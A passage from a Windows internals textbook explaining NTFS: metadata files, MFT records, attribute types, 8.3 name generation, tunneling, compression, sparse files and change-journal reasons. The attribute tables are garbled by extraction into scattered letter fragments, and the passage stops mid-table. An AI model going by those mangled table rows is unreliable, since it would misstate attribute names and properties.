in the “Recovery” section.
Another entry in the MFT is reserved for the root directory (also known as
\; for example, C:\). Its file record contains an index of the files and
directories stored in the root of the NTFS directory structure. When NTFS is
first asked to open a file, it begins its search for the file in the root directory’s
file record. After opening a file, NTFS stores the file’s MFT record number
so that it can directly access the file’s MFT record when it reads and writes
the file later.
NTFS records the allocation state of the volume in the bitmap file (file
name $BitMap). The data attribute for the bitmap file contains a bitmap, each
of whose bits represents a cluster on the volume, identifying whether the
cluster is free or has been allocated to a file.
The security file (file name $Secure) stores the volume-wide security
descriptor database. NTFS files and directories have individually settable
security descriptors, but to conserve space, NTFS stores the settings in a
common file, which allows files and directories that have the same security
settings to reference the same security descriptor. In most environments,
entire directory trees have the same security settings, so this optimization
provides a significant saving of disk space.
Another system file, the boot file (file name $Boot), stores the Windows
bootstrap code if the volume is a system volume. On nonsystem volumes,
there is code that displays an error message on the screen if an attempt is
made to boot from that volume. For the system to boot, the bootstrap code
must be located at a specific disk address so that the Boot Manager can find
it. During formatting, the format command defines this area as a file by
creating a file record for it. All files are in the MFT, and all clusters are either
free or allocated to a file—there are no hidden files or clusters in NTFS,
although some files (metadata) are not visible to users. The boot file as well
as NTFS metadata files can be individually protected by means of the
security descriptors that are applied to all Windows objects. Using this
“everything on the disk is a file” model also means that the bootstrap can be
modified by normal file I/O, although the boot file is protected from editing.
NTFS also maintains a bad-cluster file (file name $BadClus) for recording
any bad spots on the disk volume and a file known as the volume file (file
name $Volume), which contains the volume name, the version of NTFS for
which the volume is formatted, and a number of flag bits that indicate the
state and health of the volume, such as a bit that indicates that the volume is
corrupt and must be repaired by the Chkdsk utility. (The Chkdsk utility is
covered in more detail later in the chapter.) The uppercase file (file name
$UpCase) includes a translation table between lowercase and uppercase
characters. NTFS maintains a file containing an attribute definition table (file
name $AttrDef) that defines the attribute types supported on the volume and
indicates whether they can be indexed, recovered during a system recovery
operation, and so on.
Note
Figure 11-32 shows the Master File Table of a NTFS volume and
indicates the specific entries in which the metadata files are located. It is
worth mentioning that file records at position less than 16 are guaranteed
to be fixed. Metadata files located at entries greater than 16 are subject to
the order in which NTFS creates them. Indeed, the format tool doesn’t
create any metadata file above position 16; this is the duty of the NTFS
file system driver while mounting the volume for the first time (after the
formatting has been completed). The order of the metadata files generated
by the file system driver is not guaranteed.
NTFS stores several metadata files in the extensions (directory name
$Extend) metadata directory, including the object identifier file (file name
$ObjId), the quota file (file name $Quota), the change journal file (file name
$UsnJrnl), the reparse point file (file name $Reparse), the Posix delete
support directory ($Deleted), and the default resource manager directory
(directory name $RmMetadata). These files store information related to
extended features of NTFS. The object identifier file stores file object IDs,
the quota file stores quota limit and behavior information on volumes that
have quotas enabled, the change journal file records file and directory
changes, and the reparse point file stores information about which files and
directories on the volume include reparse point data.
The Posix Delete directory ($Deleted) contains files, which are invisible to
the user, that have been deleted using the new Posix semantic. Files deleted
using the Posix semantic will be moved in this directory when the application
that has originally requested the file deletion closes the file handle. Other
applications that may still have a valid reference to the file continue to run
while the file’s name is deleted from the namespace. Detailed information
about the Posix deletion has been provided in the previous section.
The default resource manager directory contains directories related to
transactional NTFS (TxF) support, including the transaction log directory
(directory name $TxfLog), the transaction isolation directory (directory
name $Txf), and the transaction repair directory (file name $Repair). The
transaction log directory contains the TxF base log file (file name
$TxfLog.blf) and any number of log container files, depending on the size of
the transaction log, but it always contains at least two: one for the Kernel
Transaction Manager (KTM) log stream (file name
$TxfLogContainer00000000000000000001), and one for the TxF log stream
(file name $TxfLogContainer00000000000000000002). The transaction log
directory also contains the TxF old page stream (file name $Tops), which
we’ll describe later.
EXPERIMENT: Viewing NTFS information
You can use the built-in Fsutil.exe command-line program to view
information about an NTFS volume, including the placement and
size of the MFT and MFT zone:
Click here to view code image
d:\>fsutil fsinfo ntfsinfo d:
NTFS Volume Serial Number : 0x48323940323933f2
NTFS Version : 3.1
LFS Version : 2.0
Number Sectors : 0x000000011c5f6fff
Total Clusters : 0x00000000238bedff
Free Clusters : 0x000000001a6e5925
Total Reserved : 0x00000000000011cd
Bytes Per Sector : 512
Bytes Per Physical Sector : 4096
Bytes Per Cluster : 4096
Bytes Per FileRecord Segment : 4096
Clusters Per FileRecord Segment : 1
Mft Valid Data Length : 0x0000000646500000
Mft Start Lcn : 0x00000000000c0000
Mft2 Start Lcn : 0x0000000000000002
Mft Zone Start : 0x00000000069f76e0
Mft Zone End : 0x00000000069f7700
Max Device Trim Extent Count : 4294967295
Max Device Trim Byte Count : 0x10000000
Max Volume Trim Extent Count : 62
Max Volume Trim Byte Count : 0x10000000
Resource Manager Identifier : 81E83020-E6FB-11E8-B862-
D89EF33A38A7
In this example, the D: volume uses 4 KB file records (MFT
entries), on a 4 KB native sector size disk (which emulates old 512-
byte sectors) and uses 4 KB clusters.
File record numbers
A file on an NTFS volume is identified by a 64-bit value called a file record
number, which consists of a file number and a sequence number. The file
number corresponds to the position of the file’s file record in the MFT minus
1 (or to the position of the base file record minus 1 if the file has more than
one file record). The sequence number, which is incremented each time an
MFT file record position is reused, enables NTFS to perform internal
consistency checks. A file record number is illustrated in Figure 11-33.
Figure 11-33 File record number.
File records
Instead of viewing a file as just a repository for textual or binary data, NTFS
stores files as a collection of attribute/value pairs, one of which is the data it
contains (called the unnamed data attribute). Other attributes that compose a
file include the file name, time stamp information, and possibly additional
named data attributes. Figure 11-34 illustrates an MFT record for a small file.
Figure 11-34 MFT record for a small file.
Each file attribute is stored as a separate stream of bytes within a file.
Strictly speaking, NTFS doesn’t read and write files; it reads and writes
attribute streams. NTFS supplies these attribute operations: create, delete,
read (byte range), and write (byte range). The read and write services
normally operate on the file’s unnamed data attribute. However, a caller can
specify a different data attribute by using the named data stream syntax.
Table 11-6 lists the attributes for files on an NTFS volume. (Not all
attributes are present for every file.) Each attribute in the NTFS file system
can be unnamed or can have a name. An example of a named attribute is the
$LOGGED_UTILITY_STREAM, which is used for various purposes by
different NTFS components. Table 11-7 lists the possible
$LOGGED_UTILITY_STREAM attribute’s names and their respective
purposes.
Table 11-6 Attributes for NTFS files
A
tt
ri
b
u
te
Att
rib
ute
Typ
e
Na
me
R
es
id
e
nt
?
Description
V
ol
u
m
e
in
f
o
r
m
at
io
n
$V
OL
UM
E_I
NF
OR
MA
TIO
N,
$V
OL
UM
E_
A
l
w
a
ys
,
A
l
w
a
ys
These attributes are present only in the $Volume
metadata file. They store volume version and label
information.
NA
ME
S
ta
n
d
ar
d
in
f
o
r
m
at
io
n
$ST
AN
DA
RD
_IN
FO
RM
ATI
ON
A
l
w
a
ys
File attributes such as read-only, archive, and so on;
time stamps, including when the file was created or last
modified.
F
il
e
n
a
m
e
$FI
LE_
NA
ME
M
a
y
b
e
The file’s name in Unicode 1.0 characters. A file can
have multiple file name attributes, as it does when a
hard link to a file exists or when a file with a long name
has an automatically generated short name for access
by MS-DOS and 16-bit Windows applications.
S
e
c
u
ri
ty
d
e
s
cr
$SE
CU
RIT
Y_
DE
SC
RIP
TO
R
M
a
y
b
e
This attribute is present for backward compatibility
with previous versions of NTFS and is rarely used in
the current version of NTFS (3.1). NTFS stores almost
all security descriptors in the $Secure metadata file,
sharing descriptors among files and directories that
have the same settings. Previous versions of NTFS
stored private security descriptor information with each
file and directory. Some files still include a
$SECURITY_DESCRIPTOR attribute, such as $Boot.
ip
to
r
D
at
a
$D
AT
A
M
a
y
b
e
The contents of the file. In NTFS, a file has one default
unnamed data attribute and can have additional named
data attributes—that is, a file can have multiple data
streams. A directory has no default data attribute but
can have optional named data attributes.
Named data streams can be used even for particular
system purposes. For example, the Storage Reserve
Area Table (SRAT) stream ($SRAT) is used by the
Storage Service for creating Space reservations on a
volume. This attribute is applied only on the $Bitmap
metadata file. Storage Reserves are described later in
this chapter.
I
n
d
e
x
r
o
ot
,
in
d
e
x
al
lo
c
at
io
$IN
DE
X_
RO
OT,
$IN
DE
X_
AL
LO
CA
TIO
N,
A
l
w
a
ys
,
N
e
v
er
Three attributes used to implement B-tree data
structures used by directories, security, quota, and other
metadata files.
n
A
tt
ri
b
ut
e
li
st
$A
TT
RIB
UT
E_L
IST
M
a
y
b
e
A list of the attributes that make up the file and the file
record number of the MFT entry where each attribute is
located. This attribute is present when a file requires
more than one MFT file record.
I
n
d
e
x
B
it
m
a
p
$BI
TM
AP
M
a
y
b
e
This attribute is used for different purposes: for
nonresident directories (where an $INDEX_
ALLOCATION always exists), the bitmap records
which 4 KB-sized index blocks are already in use by
the B-tree, and which are free for future use as B-tree
grows; In the MFT there is an unnamed “$Bitmap”
attribute that tracks which MFT segments are in use,
and which are free for future use by new files or by
existing files that require more space.
O
bj
e
ct
I
D
$O
BJE
CT
_ID
A
l
w
a
ys
A 16-byte identifier (GUID) for a file or directory. The
link-tracking service assigns object IDs to shell shortcut
and OLE link source files. NTFS provides APIs so that
files and directories can be opened with their object ID
rather than their file name.
R
e
p
ar
s
e
in
$R
EP
AR
SE_
POI
NT
M
a
y
b
e
This attribute stores a file’s reparse point data. NTFS
junctions and mount points include this attribute.
f
o
r
m
at
io
n
E
xt
e
n
d
e
d
at
tr
ib
ut
e
s
$E
A,
$E
A_I
NF
OR
MA
TIO
N
M
a
y
b
e,
A
l
w
a
ys
Extended attributes are name/value pairs and aren’t
normally used but are provided for backward
compatibility with OS/2 applications.
L
o
g
g
e
d
ut
il
it
y
st
re
a
m
$L
OG
GE
D_
UTI
LIT
Y_
ST
RE
AM
M
a
y
b
e
This attribute type can be used for various purposes by
different NTFS components. See Table 11-7 for more
details.
Table 11-7 $LOGGED_UTILITY_STREAM attribute
Attri
bute
Att
rib
ute
Typ
e
Na
me
R
es
id
e
nt
?
Description
Encr
ypte
d
File
Strea
m
$EF
S
M
a
y
b
e
EFS stores data in this attribute that’s used to
manage a file’s encryption, such as the encrypted
version of the key needed to decrypt the file and a
list of users who are authorized to access the file.
Onli
ne
encr
yptio
n
back
up
$Ef
sBa
cku
p
M
a
y
b
e
The attribute is used by the EFS Online encryption
to store chunks of the original encrypted data
stream.
Tran
sacti
onal
NTF
SDat
a
$T
XF_
DA
TA
M
a
y
b
e
When a file or directory becomes part of a
transaction, TxF also stores transaction data in the
$TXF_DATA attribute, such as the file’s unique
transaction ID.
Desir
ed
Stora
ge
$DS
C
R
es
id
e
The desired storage class is used for “pinning” a file
to a preferred storage tier. See the “NTFS support
for tiered volumes” section for more details.
Class
nt
Table 11-6 shows attribute names; however, attributes actually correspond
to numeric type codes, which NTFS uses to order the attributes within a file
record. The file attributes in an MFT record are ordered by these type codes
(numerically in ascending order), with some attribute types appearing more
than once—if a file has multiple data attributes, for example, or multiple file
names. All possible attribute types (and their names) are listed in the
$AttrDef metadata file.
Each attribute in a file record is identified with its attribute type code and
has a value and an optional name. An attribute’s value is the byte stream
composing the attribute. For example, the value of the $FILE_NAME
attribute is the file’s name; the value of the $DATA attribute is whatever
bytes the user stored in the file.
Most attributes never have names, although the index-related attributes and
the $DATA attribute often do. Names distinguish between multiple attributes
of the same type that a file can include. For example, a file that has a named
data stream has two $DATA attributes: an unnamed $DATA attribute storing
the default unnamed data stream, and a named $DATA attribute having the
name of the alternate stream and storing the named stream’s data.
File names
Both NTFS and FAT allow each file name in a path to be as many as 255
characters long. File names can contain Unicode characters as well as
multiple periods and embedded spaces. However, the FAT file system
supplied with MS-DOS is limited to 8 (non-Unicode) characters for its file
names, followed by a period and a 3-character extension. Figure 11-35
provides a visual representation of the different file namespaces Windows
supports and shows how they intersect.
Figure 11-35 Windows file namespaces.
Windows Subsystem for Linux (WSL) requires the biggest namespace of
all the application execution environments that Windows supports, and
therefore the NTFS namespace is equivalent to the WSL namespace. WSL
can create names that aren’t visible to Windows and MS-DOS applications,
including names with trailing periods and trailing spaces. Ordinarily, creating
a file using the large POSIX namespace isn’t a problem because you would
do that only if you intended WSL applications to use that file.
The relationship between 32-bit Windows applications and MS-DOS and
16-bit Windows applications is a much closer one, however. The Windows
area in Figure 11-35 represents file names that the Windows subsystem can
create on an NTFS volume but that MS-DOS and 16-bit Windows
applications can’t see. This group includes file names longer than the 8.3
format of MS-DOS names, those containing Unicode (international)
characters, those with multiple period characters or a beginning period, and
those with embedded spaces. For compatibility reasons, when a file is created
with such a name, NTFS automatically generates an alternate, MS-DOS-style
file name for the file. Windows displays these short names when you use the
/x option with the dir command.
The MS-DOS file names are fully functional aliases for the NTFS files and
are stored in the same directory as the long file names. The MFT record for a
file with an autogenerated MS-DOS file name is shown in Figure 11-36.
Figure 11-36 MFT file record with an MS-DOS file name attribute.
The NTFS name and the generated MS-DOS name are stored in the same
file record and therefore refer to the same file. The MS-DOS name can be
used to open, read from, write to, or copy the file. If a user renames the file
using either the long file name or the short file name, the new name replaces
both the existing names. If the new name isn’t a valid MS-DOS name, NTFS
generates another MS-DOS name for the file. (Note that NTFS only
generates MS-DOS-style file names for the first file name.)
Note
Hard links are implemented in a similar way. When a hard link to a file is
created, NTFS adds another file name attribute to the file’s MFT file
record, and adds an entry in the Index Allocation attribute of the directory
in which the new link resides. The two situations differ in one regard,
however. When a user deletes a file that has multiple names (hard links),
the file record and the file remain in place. The file and its record are
deleted only when the last file name (hard link) is deleted. If a file has
both an NTFS name and an autogenerated MS-DOS name, however, a
user can delete the file using either name.
Here’s the algorithm NTFS uses to generate an MS-DOS name from a
long file name. The algorithm is actually implemented in the kernel function
RtlGenerate8dot3Name and can change in future Windows releases. The
latter function is also used by other drivers, such as CDFS, FAT, and third-
party file systems:
1.
Remove from the long name any characters that are illegal in MS-
DOS names, including spaces and Unicode characters. Remove
preceding and trailing periods. Remove all other embedded periods,
except the last one.
2.
Truncate the string before the period (if present) to six characters (it
may already be six or fewer because this algorithm is applied when
any character that is illegal in MS-DOS is present in the name). If it is
two or fewer characters, generate and concatenate a four-character
hex checksum string. Append the string ~n (where n is a number,
starting with 1, that is used to distinguish different files that truncate
to the same name). Truncate the string after the period (if present) to
three characters.
3.
Put the result in uppercase letters. MS-DOS is case-insensitive, and
this step guarantees that NTFS won’t generate a new name that differs
from the old name only in case.
4.
If the generated name duplicates an existing name in the directory,
increment the ~n string. If n is greater than 4, and a checksum was not
concatenated already, truncate the string before the period to two
characters and generate and concatenate a four-character hex
checksum string.
Table 11-8 shows the long Windows file names from Figure 11-35 and
their NTFS-generated MS-DOS versions. The current algorithm and the
examples in Figure 11-35 should give you an idea of what NTFS-generated
MS-DOS-style file names look like.
Table 11-8 NTFS-generated file names
Windows Long Name
NTFS-Generated Short Name
LongFileName
LONGFI~1
UnicodeName.FDPL
UNICOD~1
File.Name.With.Dots
FILENA~1.DOT
File.Name2.With.Dots
FILENA~2.DOT
File.Name3.With.Dots
FILENA~3.DOT
File.Name4.With.Dots
FILENA~4.DOT
File.Name5.With.Dots
FIF596~1.DOT
Name With Embedded Spaces
NAMEWI~1
.BeginningDot
BEGINN~1
25¢.two characters
255440~1.TWO
©
6E2D~1
Note
Since Windows 8.1, by default all the NTFS nonbootable volumes have
short name generation disabled. You can disable short name generation
even in older version of Windows by setting
HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisable8dot
3NameCreation in the registry to a DWORD value of 1 and restarting the
machine. This could potentially break compatibility with older
applications, though.
Tunneling
NTFS uses the concept of tunneling to allow compatibility with older
programs that depend on the file system to cache certain file metadata for a
period of time even after the file is gone, such as when it has been deleted or
renamed. With tunneling, any new file created with the same name as the
original file, and within a certain period of time, will keep some of the same
metadata. The idea is to replicate behavior expected by MS-DOS programs
when using the safe save programming method, in which modified data is
copied to a temporary file, the original file is deleted, and then the temporary
file is renamed to the original name. The expected behavior in this case is that
the renamed temporary file should appear to be the same as the original file;
otherwise, the creation time would continuously update itself with each
modification (which is how the modified time is used).
NTFS uses tunneling so that when a file name is removed from a directory,
its long name and short name, as well as its creation time, are saved into a
cache. When a new file is added to a directory, the cache is searched to see
whether there is any tunneled data to restore. Because these operations apply
to directories, each directory instance has its own cache, which is deleted if
the directory is removed. NTFS will use tunneling for the following series of
operations if the names used result in the deletion and re-creation of the same
file name:
■ Delete + Create
■ Delete + Rename
■ Rename + Create
■ Rename + Rename
By default, NTFS keeps the tunneling cache for 15 seconds, although you
can modify this timeout by creating a new value called
MaximumTunnelEntryAgeInSeconds in the
HKLM\SYSTEM\CurrentControlSet\Control\FileSystem registry key.
Tunneling can also be completely disabled by creating a new value called
MaximumTunnelEntries and setting it to 0; however, this will cause older
applications to break if they rely on the compatibility behavior. On NTFS
volumes that have short name generation disabled (see the previous section),
tunneling is disabled by default.
You can see tunneling in action with the following simple experiment in
the command prompt:
1.
Create a file called file1.
2.
Wait for more than 15 seconds (the default tunnel cache timeout).
3.
Create a file called file2.
4.
Perform a dir /TC. Note the creation times.
5.
Rename file1 to file.
6.
Rename file2 to file1.
7.
Perform a dir /TC. Note that the creation times are identical.
Resident and nonresident attributes
If a file is small, all its attributes and their values (its data, for example) fit
within the file record that describes the file. When the value of an attribute is
stored in the MFT (either in the file’s main file record or an extension record
located elsewhere within the MFT), the attribute is called a resident attribute.
(In Figure 11-37, for example, all attributes are resident.) Several attributes
are defined as always being resident so that NTFS can locate nonresident
attributes. The standard information and index root attributes are always
resident, for example.
Figure 11-37 Resident attribute header and value.
Each attribute begins with a standard header containing information about
the attribute—information that NTFS uses to manage the attributes in a
generic way. The header, which is always resident, records whether the
attribute’s value is resident or nonresident. For resident attributes, the header
also contains the offset from the header to the attribute’s value and the length
of the attribute’s value, as Figure 11-37 illustrates for the file name attribute.
When an attribute’s value is stored directly in the MFT, the time it takes
NTFS to access the value is greatly reduced. Instead of looking up a file in a
table and then reading a succession of allocation units to find the file’s data
(as the FAT file system does, for example), NTFS accesses the disk once and
retrieves the data immediately.
The attributes for a small directory, as well as for a small file, can be
resident in the MFT, as Figure 11-38 shows. For a small directory, the index
root attribute contains an index (organized as a B-tree) of file record numbers
for the files (and the subdirectories) within the directory.
Figure 11-38 MFT file record for a small directory.
Of course, many files and directories can’t be squeezed into a 1 KB or 4
KB, fixed-size MFT record. If a particular attribute’s value, such as a file’s
data attribute, is too large to be contained in an MFT file record, NTFS
allocates clusters for the attribute’s value outside the MFT. A contiguous
group of clusters is called a run (or an extent). If the attribute’s value later
grows (if a user appends data to the file, for example), NTFS allocates
another run for the additional data. Attributes whose values are stored in runs
(rather than within the MFT) are called nonresident attributes. The file
system decides whether a particular attribute is resident or nonresident; the
location of the data is transparent to the process accessing it.
When an attribute is nonresident, as the data attribute for a large file will
certainly be, its header contains the information NTFS needs to locate the
attribute’s value on the disk. Figure 11-39 shows a nonresident data attribute
stored in two runs.
Figure 11-39 MFT file record for a large file with two data runs.
Among the standard attributes, only those that can grow can be
nonresident. For files, the attributes that can grow are the data and the
attribute list (not shown in Figure 11-39). The standard information and file
name attributes are always resident.
A large directory can also have nonresident attributes (or parts of
attributes), as Figure 11-40 shows. In this example, the MFT file record
doesn’t have enough room to store the B-tree that contains the index of files
that are within this large directory. A part of the index is stored in the index
root attribute, and the rest of the index is stored in nonresident runs called
index allocations. The index root, index allocation, and bitmap attributes are
shown here in a simplified form. They are described in more detail in the
next section. The standard information and file name attributes are always
resident. The header and at least part of the value of the index root attribute
are also resident for directories.
Figure 11-40 MFT file record for a large directory with a nonresident file
name index.
When an attribute’s value can’t fit in an MFT file record and separate
allocations are needed, NTFS keeps track of the runs by means of VCN-to-
LCN mapping pairs. LCNs represent the sequence of clusters on an entire
volume from 0 through n. VCNs number the clusters belonging to a
particular file from 0 through m. For example, the clusters in the runs of a
nonresident data attribute are numbered as shown in Figure 11-41.
Figure 11-41 VCNs for a nonresident data attribute.
If this file had more than two runs, the numbering of the third run would
start with VCN 8. As Figure 11-42 shows, the data attribute header contains
VCN-to-LCN mappings for the two runs here, which allows NTFS to easily
find the allocations on the disk.
Figure 11-42 VCN-to-LCN mappings for a nonresident data attribute.
Although Figure 11-41 shows just data runs, other attributes can be stored
in runs if there isn’t enough room in the MFT file record to contain them.
And if a particular file has too many attributes to fit in the MFT record, a
second MFT record is used to contain the additional attributes (or attribute
headers for nonresident attributes). In this case, an attribute called the
attribute list is added. The attribute list attribute contains the name and type
code of each of the file’s attributes and the file number of the MFT record
where the attribute is located. The attribute list attribute is provided for those
cases where all of a file’s attributes will not fit within the file’s file record or
when a file grows so large or so fragmented that a single MFT record can’t
contain the multitude of VCN-to-LCN mappings needed to find all its runs.
Files with more than 200 runs typically require an attribute list. In summary,
attribute headers are always contained within file records in the MFT, but an
attribute’s value may be located outside the MFT in one or more extents.
Data compression and sparse files
NTFS supports compression on a per-file, per-directory, or per-volume basis
using a variant of the LZ77 algorithm, known as LZNT1. (NTFS
compression is performed only on user data, not file system metadata.) In
Windows 8.1 and later, files can also be compressed using a newer suite of
algorithms, which include LZX (most compact) and XPRESS (including
using 4, 8, or 16K block sizes, in order of speed). This type of compression,
which can be used through commands such as the compact shell command
(as well as File Provder APIs), leverages the Windows Overlay Filter (WOF)
file system filter driver (Wof.sys), which uses an NTFS alternate data stream
and sparse files, and is not part of the NTFS driver per se. WOF is outside the
scope of this book, but you can read more about it here:
https://devblogs.microsoft.com/oldnewthing/20190618-00/?p=102597.
You can tell whether a volume is compressed by using the Windows
GetVolumeInformation function. To retrieve the actual compressed size of a
file, use the Windows GetCompressedFileSize function. Finally, to examine
or change the compression setting for a file or directory, use the Windows
DeviceIoControl function. (See the FSCTL_GET_COMPRESSION and
FSCTL_SET_COMPRESSION file system control codes.) Keep in mind that
although setting a file’s compression state compresses (or decompresses) the
file right away, setting a directory’s or volume’s compression state doesn’t
cause any immediate compression or decompression. Instead, setting a
directory’s or volume’s compression state sets a default compression state
that will be given to all newly created files and subdirectories within that
directory or volume (although, if you were to set directory compression using
the directory’s property page within Explorer, the contents of the entire
directory tree will be compressed immediately).
The following section introduces NTFS compression by examining the
simple case of compressing sparse data. The subsequent sections extend the
discussion to the compression of ordinary files and sparse files.
Note
NTFS compression is not supported in DAX volumes or for encrypted
files.
Compressing sparse data
Sparse data is often large but contains only a small amount of nonzero data
relative to its size. A sparse matrix is one example of sparse data. As
described earlier, NTFS uses VCNs, from 0 through m, to enumerate the
clusters of a file. Each VCN maps to a corresponding LCN, which identifies
the disk location of the cluster. Figure 11-43 illustrates the runs (disk
allocations) of a normal, noncompressed file, including its VCNs and the
LCNs they map to.
Figure 11-43 Runs of a noncompressed file.
This file is stored in three runs, each of which is 4 clusters long, for a total
of 12 clusters. Figure 11-44 shows the MFT record for this file. As described
earlier, to save space, the MFT record’s data attribute, which contains VCN-
to-LCN mappings, records only one mapping for each run, rather than one
for each cluster. Notice, however, that each VCN from 0 through 11 has a
corresponding LCN associated with it. The first entry starts at VCN 0 and
covers 4 clusters, the second entry starts at VCN 4 and covers 4 clusters, and
so on. This entry format is typical for a noncompressed file.
Figure 11-44 MFT record for a noncompressed file.
When a user selects a file on an NTFS volume for compression, one NTFS
compression technique is to remove long strings of zeros from the file. If the
file’s data is sparse, it typically shrinks to occupy a fraction of the disk space
it would otherwise require. On subsequent writes to the file, NTFS allocates
space only for runs that contain nonzero data.
Figure 11-45 depicts the runs of a compressed file containing sparse data.
Notice that certain ranges of the file’s VCNs (16–31 and 64–127) have no
disk allocations.
Figure 11-45 Runs of a compressed file containing sparse data.
The MFT record for this compressed file omits blocks of VCNs that
contain zeros and therefore have no physical storage allocated to them. The
first data entry in Figure 11-46, for example, starts at VCN 0 and covers 16
clusters. The second entry jumps to VCN 32 and covers 16 clusters.
Figure 11-46 MFT record for a compressed file containing sparse data.
When a program reads data from a compressed file, NTFS checks the
MFT record to determine whether a VCN-to-LCN mapping covers the
location being read. If the program is reading from an unallocated “hole” in
the file, it means that the data in that part of the file consists of zeros, so
NTFS returns zeros without further accessing the disk. If a program writes
nonzero data to a “hole,” NTFS quietly allocates disk space and then writes
the data. This technique is very efficient for sparse file data that contains a lot
of zero data.
Compressing nonsparse data
The preceding example of compressing a sparse file is somewhat contrived. It
describes “compression” for a case in which whole sections of a file were
filled with zeros, but the remaining data in the file wasn’t affected by the
compression. The data in most files isn’t sparse, but it can still be compressed
by the application of a compression algorithm.
In NTFS, users can specify compression for individual files or for all the
files in a directory. (New files created in a directory marked for compression
are automatically compressed—existing files must be compressed
individually when programmatically enabling compression with
FSCTL_SET_COMPRESSION.) When it compresses a file, NTFS divides
the file’s unprocessed data into compression units 16 clusters long (equal to
128 KB for a 8 KB cluster, for example). Certain sequences of data in a file
might not compress much, if at all; so for each compression unit in the file,
NTFS determines whether compressing the unit will save at least 1 cluster of
storage. If compressing the unit won’t free up at least 1 cluster, NTFS
allocates a 16-cluster run and writes the data in that unit to disk without
compressing it. If the data in a 16-cluster unit will compress to 15 or fewer
clusters, NTFS allocates only the number of clusters needed to contain the
compressed data and then writes it to disk. Figure 11-47 illustrates the
compression of a file with four runs. The unshaded areas in this figure
represent the actual storage locations that the file occupies after compression.
The first, second, and fourth runs were compressed; the third run wasn’t.
Even with one noncompressed run, compressing this file saved 26 clusters of
disk space, or 41%.
Figure 11-47 Data runs of a compressed file.
Note
Although the diagrams in this chapter show contiguous LCNs, a
compression unit need not be stored in physically contiguous clusters.
Runs that occupy noncontiguous clusters produce slightly more
complicated MFT records than the one shown in Figure 11-47.
When it writes data to a compressed file, NTFS ensures that each run
begins on a virtual 16-cluster boundary. Thus the starting VCN of each run is
a multiple of 16, and the runs are no longer than 16 clusters. NTFS reads and
writes at least one compression unit at a time when it accesses compressed
files. When it writes compressed data, however, NTFS tries to store
compression units in physically contiguous locations so that it can read them
all in a single I/O operation. The 16-cluster size of the NTFS compression
unit was chosen to reduce internal fragmentation: the larger the compression
unit, the less the overall disk space needed to store the data. This 16-cluster
compression unit size represents a trade-off between producing smaller
compressed files and slowing read operations for programs that randomly
access files. The equivalent of 16 clusters must be decompressed for each
cache miss. (A cache miss is more likely to occur during random file access.)
Figure 11-48 shows the MFT record for the compressed file shown in Figure
11-47.
Figure 11-48 MFT record for a compressed file.
One difference between this compressed file and the earlier example of a
compressed file containing sparse data is that three of the compressed runs in
this file are less than 16 clusters long. Reading this information from a file’s
MFT file record enables NTFS to know whether data in the file is
compressed. Any run shorter than 16 clusters contains compressed data that
NTFS must decompress when it first reads the data into the cache. A run that
is exactly 16 clusters long doesn’t contain compressed data and therefore
requires no decompression.
If the data in a run has been compressed, NTFS decompresses the data into
a scratch buffer and then copies it to the caller’s buffer. NTFS also loads the
decompressed data into the cache, which makes subsequent reads from the
same run as fast as any other cached read. NTFS writes any updates to the
file to the cache, leaving the lazy writer to compress and write the modified
data to disk asynchronously. This strategy ensures that writing to a
compressed file produces no more significant delay than writing to a
noncompressed file would.
NTFS keeps disk allocations for a compressed file contiguous whenever
possible. As the LCNs indicate, the first two runs of the compressed file
shown in Figure 11-47 are physically contiguous, as are the last two. When
two or more runs are contiguous, NTFS performs disk read-ahead, as it does
with the data in other files. Because the reading and decompression of
contiguous file data take place asynchronously before the program requests
the data, subsequent read operations obtain the data directly from the cache,
which greatly enhances read performance.
Sparse files
Sparse files (the NTFS file type, as opposed to files that consist of sparse
data, as described earlier) are essentially compressed files for which NTFS
doesn’t apply compression to the file’s nonsparse data. However, NTFS
manages the run data of a sparse file’s MFT record the same way it does for
compressed files that consist of sparse and nonsparse data.
The change journal file
The change journal file, \$Extend\$UsnJrnl, is a sparse file in which NTFS
stores records of changes to files and directories. Applications like the
Windows File Replication Service (FRS) and the Windows Search service
make use of the journal to respond to file and directory changes as they
occur.
The journal stores change entries in the $J data stream and the maximum
size of the journal in the $Max data stream. Entries are versioned and include
the following information about a file or directory change:
■ The time of the change
■ The reason for the change (see Table 11-9)
■ The file or directory’s attributes
■ The file or directory’s name
■ The file or directory’s MFT file record number
■ The file record number of the file’s parent directory
■ The security ID
■ The update sequence number (USN) of the record
■ Additional information about the source of the change (a user, the
FRS, and so on)
Table 11-9 Change journal change reasons
Identifier
Reason
USN_REASON
_DATA_OVER
WRITE
The data in the file or directory was overwritten.
USN_REASON
_DATA_EXTE
ND
Data was added to the file or directory.
USN_REASON
_DATA_TRUN
CATION
The data in the file or directory was truncated.
USN_REASON
_NAMED_DAT
A_OVERWRIT
E
The data in a file’s data stream was overwritten.
USN_REASON
_NAMED_DAT
A_EXTEND
The data in a file’s data stream was extended.
USN_REASON
_NAMED_DAT
A_TRUNCATI
ON
The data in a file’s data stream was truncated.
USN_REASON
_FILE_CREAT
E
A new file or directory was created.
USN_REASON
_FILE_DELETE
A file or directory was deleted.
USN_REASON
_EA_CHANGE
The extended attributes for a file or directory
changed.
USN_REASON
_SECURITY_C
HANGE
The security descriptor for a file or directory was
changed.
USN_REASON
_RENAME_OL
D_NAME
A file or directory was renamed; this is the old
name.
USN_REASON
_RENAME_NE
W_NAME
A file or directory was renamed; this is the new
name.
USN_REASON
_INDEXABLE_
CHANGE
The indexing state for the file or directory was
changed (whether or not the Indexing service will
process this file or directory).
USN_REASON
_BASIC_INFO_
CHANGE
The file or directory attributes and/or the time
stamps were changed.
USN_REASON
_HARD_LINK_
CHANGE
A hard link was added or removed from the file or
directory.
USN_REASON
_COMPRESSIO
N_CHANGE
The compression state for the file or directory was
changed.
USN_REASON
_ENCRYPTION
_CHANGE
The encryption state (EFS) was enabled or disabled
for this file or directory.
USN_REASON
_OBJECT_ID_C
HANGE
The object ID for this file or directory was changed.
USN_REASON
_REPARSE_PO
The reparse point for a file or directory was
changed, or a new reparse point (such as a symbolic
INT_CHANGE
link) was added or deleted from a file or directory.
USN_REASON
_STREAM_CH
ANGE
A new data stream was added to or removed from a
file or renamed.
USN_REASON
_TRANSACTE
D_CHANGE
This value is added (ORed) to the change reason to
indicate that the change was the result of a recent
commit of a TxF transaction.
USN_REASON
_CLOSE
The handle to a file or directory was closed,
indicating that this is the final modification made to
the file in this series of operations.
USN_REASON
_INTEGRITY_
CHANGE
The content of a file’s extent (run) has changed, so
